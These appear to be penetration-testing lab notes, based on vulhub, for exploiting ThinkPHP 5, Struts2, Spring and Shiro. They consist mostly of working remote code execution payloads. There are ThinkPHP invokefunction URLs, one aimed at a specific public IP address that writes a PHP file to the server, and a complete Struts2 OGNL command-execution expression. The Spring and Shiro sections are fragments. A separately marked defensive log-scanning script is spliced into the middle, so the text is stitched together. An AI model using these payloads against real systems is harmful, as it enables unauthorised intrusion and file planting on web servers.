Frameworks
ThinkPHP (TP)
vulhub/thinkphp/5-rce
Start the environment with docker-compose up -d
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
http://8.152.3.217:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php phpinfo();?>' >>1.php
Test the link
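Added example (not part of the original notes): a log check for the ThinkPHP request shape shown above, flagging an s= route whose segments are not plain identifiers or whose action is invokefunction. The combined log format, SAFE_SEGMENT_RE, classify and scan are assumptions of this example, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d(?:\.\d)?"')
# Assumption for this example: a legitimate route segment is a plain identifier.
SAFE_SEGMENT_RE = re.compile(r'^[A-Za-z][\w.]*$')

def classify(log_line):
    """Return the reasons a request matches the s= route abuse, or [] if none."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    # parse_qs percent-decodes, so %5C and a raw backslash are treated alike.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    reasons = []
    for route in query.get("s", []):
        segments = [seg for seg in route.split("/") if seg]
        if any(not SAFE_SEGMENT_RE.match(seg) for seg in segments):
            reasons.append("non-identifier segment in s= route")
        if segments and segments[-1].lower() == "invokefunction":
            reasons.append("invokefunction action requested")
    if "function" in query and reasons:
        reasons.append("caller-supplied function name")
    return reasons

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?s=index/index/hello HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?s=index/think%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 90211',
    '192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "GET /static/app.css HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return (client address, reasons) for every flagged line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```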
Struts2
Open the lab target and go to:
/struts2-showcase
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
Spring
Spring code execution (CVE-2018-1273)
Capture the request
Written successfully
Spring Data REST remote command execution (CVE-2017-8046)
Shiro
Establish the connection